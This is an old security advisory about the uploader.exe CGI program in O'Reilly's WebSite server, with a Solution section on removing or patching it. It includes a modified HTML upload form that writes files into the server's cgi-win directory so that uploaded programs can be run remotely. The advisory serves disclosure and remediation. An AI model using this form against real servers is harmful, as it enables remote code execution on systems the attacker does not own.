COMMAND

    uploader.exe

SYSTEMS AFFECTED

    Wint NT

PROBLEM

    Herman de Vette found  following.  O'reilly's webserver  'website'
    contains a demopackage that contains the cgi-program uploader.exe.
    The following html-page was included with it:

    <HTML><HEAD><TITLE>Upload a File</TITLE></HEAD>

    <BODY>

    <H1>Upload a file</H1>

    <hr>

    <h2>NOTE: Your browser must support file uploading.</H2>

    <FORM ENCTYPE="multipart/form-data" METHOD=POST
    ACTION="/cgi-win/uploader.exe/Uploads/">

    <PRE>Your name:        <INPUT TYPE=TEXT SIZE=20 NAME="name"> (required)

    Email address:    <INPUT TYPE=TEXT SIZE=20 NAME="email"> (required)

                      <b>NOTE:</b> If you don't see a "browse" button below,
    your browser doesn 't support form-based file uploading. Netscape 2.0 and
    later have this support.

    File to upload:   <INPUT TYPE=FILE NAME="upl-file" SIZE=40>

    File description: <INPUT TYPE=TEXT SIZE=40 NAME="desc"> (required)

                      <INPUT TYPE=SUBMIT VALUE="Upload Now"></PRE>

    </FORM>

    <HR>

    <A HREF="mailto:...">

    <address>...</address>

    </A></BODY></HTML>

    The program uploader.exe doesn't check anything at all. If  you're
    lucky you're running  windows NT and  have put only  "read/execute
    access" on cgi-win and  other executable paths. Otherwise  (win95)
    you have a real problem. You could create a CGI-program, next  you
    change the HTML-file a little like this:

    <HTML><HEAD><TITLE>Upload Any File Anywhere</TITLE></HEAD>

    <BODY>

    <FORM ENCTYPE="multipart/form-data" METHOD=POST
    ACTION="http://host.of.vulnerable.website/cgi-win/uploader.exe/cgi-win/">

      <INPUT TYPE=HIDDEN NAME="name" VALUE="Foo">

      <INPUT TYPE=HIDDEN NAME="email" VALUE="Foo@bar.com>

      File to upload: <INPUT TYPE=FILE NAME="upl-file" SIZE=40><BR>

      <INPUT TYPE=TEXT SIZE=40 NAME="desc" VALUE="YouGottaSecurityProblem">

      <INPUT TYPE=SUBMIT VALUE="Upload Now">

    </FORM>

    </BODY></HTML>

    Open the  html-file in  your browser,  select a  nice CGI-file  to
    upload And  run that  CGI-program remotely.  (No need  to tell you
    what this CGI-program could do, could  be .bat file too in one  of
    website's other cgi-directories)

SOLUTION

    Remove uploader.exe, delete it, empty  your trash bin and use  ftp
    for  file-upload.   This  hole  did  exist  prior to the July 1996
    revision of uploader.bas,  when  Mark  Bracewell added a  security
    fix.  The fix has been available since that time at

        http://software.ora.com/techsupport/software/updates.html

    The revised uploader was also included in WebSite 1.1g.  Note that
    at this time current  WebSite Professional 2.0 Beta  is vulnerable
    to the uploader.exe problem also.